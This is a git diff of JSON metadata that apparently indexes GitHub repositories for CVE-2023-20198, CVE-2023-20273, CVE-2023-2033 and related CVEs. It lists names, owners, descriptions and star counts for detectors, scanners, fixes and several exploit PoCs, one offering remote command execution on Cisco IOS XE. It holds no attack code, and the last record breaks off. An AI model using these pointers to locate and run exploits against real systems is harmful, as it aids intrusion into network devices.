"html_url": "https:\/\/github.com\/JoyGhoshs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2023-20198", + "description": "Checker for CVE-2023-20198 , Not a full POC Just checks the implementation and detects if hex is in response or not", + "fork": false, + "created_at": "2023-10-18T07:53:29Z", + "updated_at": "2023-10-18T07:58:31Z", + "pushed_at": "2023-10-18T07:58:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706591699, + "name": "CVE-2023-20198", + "full_name": "Tounsi007\/CVE-2023-20198", + "owner": { + "login": "Tounsi007", + "id": 50546276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50546276?v=4", + "html_url": "https:\/\/github.com\/Tounsi007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tounsi007\/CVE-2023-20198", + "description": "CVE-2023-20198 PoC (!)", + "fork": false, + "created_at": "2023-10-18T08:50:49Z", + "updated_at": "2023-10-26T02:37:03Z", + "pushed_at": "2023-10-17T14:02:51Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706759894, + "name": "CVE_2023_20198_Detector", + "full_name": "alekos3\/CVE_2023_20198_Detector", + "owner": { + "login": "alekos3", + "id": 79263622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79263622?v=4", + "html_url": "https:\/\/github.com\/alekos3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alekos3\/CVE_2023_20198_Detector", + "description": "This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198", + "fork": false, + "created_at": "2023-10-18T15:04:57Z", + "updated_at": "2023-10-24T20:08:54Z", + "pushed_at": "2023-10-31T01:53:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707531165, + "name": "Cisco_CVE-2023-20198", + "full_name": "reket99\/Cisco_CVE-2023-20198", + "owner": { + "login": "reket99", + "id": 42685719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42685719?v=4", + "html_url": "https:\/\/github.com\/reket99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reket99\/Cisco_CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-20T05:28:40Z", + "updated_at": "2023-10-20T09:13:11Z", + "pushed_at": "2023-10-19T13:44:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 707768225, + "name": "cve-2023-20198", + "full_name": "iveresk\/cve-2023-20198", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2023-20198", + "description": "1vere$k POC on the CVE-2023-20198", + "fork": false, + "created_at": "2023-10-20T16:01:17Z", + "updated_at": "2023-12-06T03:03:43Z", + "pushed_at": "2023-10-20T21:51:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707899105, + "name": "CVE-2023-20198", + "full_name": "sohaibeb\/CVE-2023-20198", + "owner": { + "login": "sohaibeb", + "id": 25540162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25540162?v=4", + "html_url": "https:\/\/github.com\/sohaibeb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sohaibeb\/CVE-2023-20198", + "description": "CISCO CVE POC SCRIPT", + "fork": false, + "created_at": "2023-10-20T23:34:12Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-21T00:31:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708870245, + "name": "cisco-ios-xe-implant-detection", + "full_name": "fox-it\/cisco-ios-xe-implant-detection", + "owner": { + "login": "fox-it", + "id": 468621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4", + "html_url": "https:\/\/github.com\/fox-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fox-it\/cisco-ios-xe-implant-detection", + "description": "Cisco IOS XE implant scanning & detection (CVE-2023-20198, CVE-2023-20273)", + "fork": false, + "created_at": "2023-10-23T14:52:18Z", + "updated_at": "2024-10-21T10:39:02Z", + "pushed_at": "2023-11-07T12:21:26Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "badcandy", + "cisco", + "cisco-ios-xe", + "cve-2023-20198", + "cve-2023-20273", + "iocisco", + "pcap", + "suricata" + ], + "visibility": "public", + "forks": 8, + "watchers": 36, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 708903459, + "name": "CVE-2023-20198", + "full_name": "Pushkarup\/CVE-2023-20198", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-20198", + "description": "A PoC for CVE 2023-20198", + "fork": false, + "created_at": "2023-10-23T16:04:23Z", + "updated_at": "2024-02-12T20:11:46Z", + "pushed_at": "2023-10-23T19:10:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708983573, + "name": "CVE-2023-20198-Scanner", + "full_name": "Shadow0ps\/CVE-2023-20198-Scanner", + "owner": { + "login": "Shadow0ps", + "id": 6516174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4", + "html_url": "https:\/\/github.com\/Shadow0ps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2023-20198-Scanner", + "description": "This is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273", + "fork": false, + "created_at": "2023-10-23T19:25:29Z", + "updated_at": "2024-11-06T11:11:23Z", + "pushed_at": "2023-10-24T18:17:43Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": true, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709227946, + "name": "CVE-2023-20198", + "full_name": "kacem-expereo\/CVE-2023-20198", + "owner": { + "login": "kacem-expereo", + "id": 115718278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115718278?v=4", + "html_url": "https:\/\/github.com\/kacem-expereo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kacem-expereo\/CVE-2023-20198", + "description": "Check a target IP for CVE-2023-20198", + "fork": false, + "created_at": "2023-10-24T09:36:37Z", + "updated_at": "2023-10-26T09:12:20Z", + "pushed_at": "2023-10-24T09:42:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709677069, + "name": "CVE-2023-20198-IOS-XE-Scanner", + "full_name": "mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner", + "description": null, + "fork": false, + "created_at": "2023-10-25T07:13:59Z", + "updated_at": "2023-10-25T12:20:24Z", + "pushed_at": "2023-10-25T11:40:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710019547, + "name": "CVE-2023-20198", + "full_name": "ohlawd\/CVE-2023-20198", + "owner": { + "login": "ohlawd", + "id": 55877722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55877722?v=4", + "html_url": "https:\/\/github.com\/ohlawd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohlawd\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:02:22Z", + "updated_at": "2023-10-25T21:03:27Z", + "pushed_at": "2023-10-25T21:03:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710023699, + "name": "CVE-2023-20198", + "full_name": "IceBreakerCode\/CVE-2023-20198", + "owner": { + "login": "IceBreakerCode", + "id": 129914557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4", + "html_url": "https:\/\/github.com\/IceBreakerCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:15:58Z", + "updated_at": "2023-10-25T21:40:42Z", + "pushed_at": "2023-10-25T21:20:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713890378, + "name": "CVE-2023-20198", + "full_name": "RevoltSecurities\/CVE-2023-20198", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-20198", + "description": "An Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS routers ", + "fork": false, + "created_at": "2023-11-03T13:05:59Z", + "updated_at": "2024-11-26T16:58:31Z", + "pushed_at": "2023-11-03T13:54:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 719665038, + "name": "CVE-2023-20198", + "full_name": "smokeintheshell\/CVE-2023-20198", + "owner": { + "login": "smokeintheshell", + "id": 19311214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4", + "html_url": "https:\/\/github.com\/smokeintheshell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20198", + "description": "CVE-2023-20198 Exploit PoC", + "fork": false, + "created_at": "2023-11-16T16:39:38Z", + "updated_at": "2024-11-25T14:23:09Z", + "pushed_at": "2023-12-07T22:34:43Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729302860, + "name": "CVE-2023-20198-Fix", + "full_name": "netbell\/CVE-2023-20198-Fix", + "owner": { + "login": "netbell", + "id": 47117028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47117028?v=4", + "html_url": "https:\/\/github.com\/netbell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netbell\/CVE-2023-20198-Fix", + "description": "Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198", + "fork": false, + "created_at": "2023-12-08T21:12:00Z", + "updated_at": "2023-12-08T21:12:00Z", + "pushed_at": "2023-12-09T17:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730163821, + "name": "Cisco_CVE-2023-20198", + "full_name": "Vulnmachines\/Cisco_CVE-2023-20198", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Cisco_CVE-2023-20198", + "description": "Cisco CVE-2023-20198", + "fork": false, + "created_at": "2023-12-11T10:41:48Z", + "updated_at": "2023-12-11T18:45:44Z", + "pushed_at": "2023-12-11T10:44:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791680827, + "name": "CVE-2023-20198-RCE", + "full_name": "W01fh4cker\/CVE-2023-20198-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-20198-RCE", + "description": "CVE-2023-20198-RCE, support adding\/deleting users and executing cli commands\/system commands.", + "fork": false, + "created_at": "2024-04-25T06:59:53Z", + "updated_at": "2024-07-15T13:33:36Z", + "pushed_at": "2024-04-25T07:32:57Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 847623387, + "name": "CVE-2023-20198", + "full_name": "sanan2004\/CVE-2023-20198", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2024-08-26T08:16:28Z", + "updated_at": "2024-08-26T08:31:22Z", + "pushed_at": "2024-08-26T08:31:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856822730, + "name": "Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "full_name": "AhmedMansour93\/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-", + "description": "🚨 Just completed a detailed investigation for Event ID 193: \"SOC231 - Cisco IOS XE Web UI ZeroDay (CVE-2023-20198)\" via @LetsDefend.io. The attacker successfully bypassed authentication, gaining admin control over the device! Immediate containment was critical. Stay vigilant! 💻🔐", + "fork": false, + "created_at": "2024-09-13T09:17:49Z", + "updated_at": "2024-09-13T09:18:45Z", + "pushed_at": "2024-09-13T09:18:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892414102, + "name": "cve-2023-20198-poc", + "full_name": "XiaomingX\/cve-2023-20198-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2023-20198-poc", + "description": "CVE-2023-20198是思科IOS XE软件Web UI功能中的一个严重漏洞,允许未经身份验证的远程攻击者在受影响的系统上创建具有特权级别15的账户,从而完全控制设备。", + "fork": false, + "created_at": "2024-11-22T04:10:28Z", + "updated_at": "2024-11-26T15:13:33Z", + "pushed_at": "2024-11-22T04:12:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20209.json b/2023/CVE-2023-20209.json new file mode 100644 index 0000000000..a0e81687e2 --- /dev/null +++ b/2023/CVE-2023-20209.json @@ -0,0 +1,33 @@ +[ + { + "id": 697854392, + "name": "CVE-2023-20209", + "full_name": "peter5he1by\/CVE-2023-20209", + "owner": { + "login": "peter5he1by", + "id": 86906331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86906331?v=4", + "html_url": "https:\/\/github.com\/peter5he1by", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peter5he1by\/CVE-2023-20209", + "description": null, + "fork": false, + "created_at": "2023-09-28T15:55:22Z", + "updated_at": "2023-10-05T10:57:42Z", + "pushed_at": "2023-09-27T09:38:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2023.json b/2023/CVE-2023-2023.json new file mode 100644 index 0000000000..93ba868bdd --- /dev/null +++ b/2023/CVE-2023-2023.json @@ -0,0 +1,64 @@ +[ + { + "id": 679185431, + "name": "Hvv2023", + "full_name": "thatformat\/Hvv2023", + "owner": { + "login": "thatformat", + "id": 46617017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46617017?v=4", + "html_url": "https:\/\/github.com\/thatformat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatformat\/Hvv2023", + "description": "HW2023@POC@EXP@CVE-2023-2023", + "fork": false, + "created_at": "2023-08-16T09:30:24Z", + "updated_at": "2024-07-02T05:49:56Z", + "pushed_at": "2023-08-16T08:17:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758110379, + "name": "PHP-CVE-2023-2023-2640-POC-Escalation", + "full_name": "druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation", + "owner": { + "login": "druxter-x", + "id": 1912258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1912258?v=4", + "html_url": "https:\/\/github.com\/druxter-x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/druxter-x\/PHP-CVE-2023-2023-2640-POC-Escalation", + "description": null, + "fork": false, + "created_at": "2024-02-15T16:35:59Z", + "updated_at": "2024-02-15T16:39:41Z", + "pushed_at": "2024-02-15T17:10:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2024.json b/2023/CVE-2023-2024.json new file mode 100644 index 0000000000..983da9d854 --- /dev/null +++ b/2023/CVE-2023-2024.json @@ -0,0 +1,33 @@ +[ + { + "id": 727309635, + "name": "CVE-2023-2024", + "full_name": "team890\/CVE-2023-2024", + "owner": { + "login": "team890", + "id": 138309416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138309416?v=4", + "html_url": "https:\/\/github.com\/team890", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/team890\/CVE-2023-2024", + "description": "For Aina", + "fork": false, + "created_at": "2023-12-04T15:55:22Z", + "updated_at": "2024-11-12T14:57:40Z", + "pushed_at": "2024-05-30T11:28:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20273.json b/2023/CVE-2023-20273.json new file mode 100644 index 0000000000..cf2db79d02 --- /dev/null +++ b/2023/CVE-2023-20273.json @@ -0,0 +1,33 @@ +[ + { + "id": 729425545, + "name": "CVE-2023-20273", + "full_name": "smokeintheshell\/CVE-2023-20273", + "owner": { + "login": "smokeintheshell", + "id": 19311214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4", + "html_url": "https:\/\/github.com\/smokeintheshell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20273", + "description": "CVE-2023-20273 Exploit PoC", + "fork": false, + "created_at": "2023-12-09T07:25:43Z", + "updated_at": "2024-10-27T00:43:32Z", + "pushed_at": "2024-04-01T18:59:05Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2033.json b/2023/CVE-2023-2033.json new file mode 100644 index 0000000000..e9a205ee88 --- /dev/null +++ b/2023/CVE-2023-2033.json @@ -0,0 +1,162 @@ +[ + { + "id": 628773544, + "name": "CVE-2023-2033", + "full_name": "insoxin\/CVE-2023-2033", + "owner": { + "login": "insoxin", + "id": 19371836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19371836?v=4", + "html_url": "https:\/\/github.com\/insoxin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insoxin\/CVE-2023-2033", + "description": "Reproduce CVE-2023-2033", + "fork": false, + "created_at": "2023-04-17T00:25:16Z", + "updated_at": "2023-04-25T02:29:27Z", + "pushed_at": "2023-04-19T00:40:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 633007710, + "name": "CVE-2023-2033-Analysis", + "full_name": "sandumjacob\/CVE-2023-2033-Analysis", + "owner": { + "login": "sandumjacob", + "id": 36341780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36341780?v=4", + "html_url": "https:\/\/github.com\/sandumjacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sandumjacob\/CVE-2023-2033-Analysis", + "description": "A collection of resources and information about CVE-2023-2033", + "fork": false, + "created_at": "2023-04-26T15:24:02Z", + "updated_at": "2024-07-14T07:43:48Z", + "pushed_at": "2023-08-13T21:53:14Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2033", + "exploitation", + "v8", + "v8-javascript-engine" + ], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634395831, + "name": "CVE-2023-2033-analysis", + "full_name": "gretchenfrage\/CVE-2023-2033-analysis", + "owner": { + "login": "gretchenfrage", + "id": 14357474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14357474?v=4", + "html_url": "https:\/\/github.com\/gretchenfrage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gretchenfrage\/CVE-2023-2033-analysis", + "description": null, + "fork": false, + "created_at": "2023-04-30T01:18:25Z", + "updated_at": "2023-04-30T01:18:26Z", + "pushed_at": "2023-04-30T01:18:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673776946, + "name": "CVE-2023-2033", + "full_name": "mistymntncop\/CVE-2023-2033", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-2033", + "description": null, + "fork": false, + "created_at": "2023-08-02T11:55:30Z", + "updated_at": "2024-10-24T07:34:42Z", + "pushed_at": "2023-08-15T03:31:13Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 63, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 679512175, + "name": "CVE-2023-2033", + "full_name": "tianstcht\/CVE-2023-2033", + "owner": { + "login": "tianstcht", + "id": 32213198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4", + "html_url": "https:\/\/github.com\/tianstcht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-2033", + "description": null, + "fork": false, + "created_at": "2023-08-17T02:40:42Z", + "updated_at": "2023-08-17T02:40:43Z", + "pushed_at": "2023-08-17T02:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20562.json b/2023/CVE-2023-20562.json new file mode 100644 index 0000000000..6a7d27a599 --- /dev/null +++ b/2023/CVE-2023-20562.json @@ -0,0 +1,64 @@ +[ + { + "id": 680961189, + "name": "HITCON-2023-Demo-CVE-2023-20562", + "full_name": "zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562", + "owner": { + "login": "zeze-zeze", + "id": 33378686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33378686?v=4", + "html_url": "https:\/\/github.com\/zeze-zeze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeze-zeze\/HITCON-2023-Demo-CVE-2023-20562", + "description": null, + "fork": false, + "created_at": "2023-08-21T00:31:50Z", + "updated_at": "2024-11-15T16:48:15Z", + "pushed_at": "2023-08-21T00:33:08Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 57, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 681042384, + "name": "HITCON-2023-Demo-CVE-2023-20562", + "full_name": "passwa11\/HITCON-2023-Demo-CVE-2023-20562", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/HITCON-2023-Demo-CVE-2023-20562", + "description": null, + "fork": false, + "created_at": "2023-08-21T06:25:09Z", + "updated_at": "2024-01-12T02:38:02Z", + "pushed_at": "2023-08-21T06:25:26Z", + "stargazers_count": 4, + 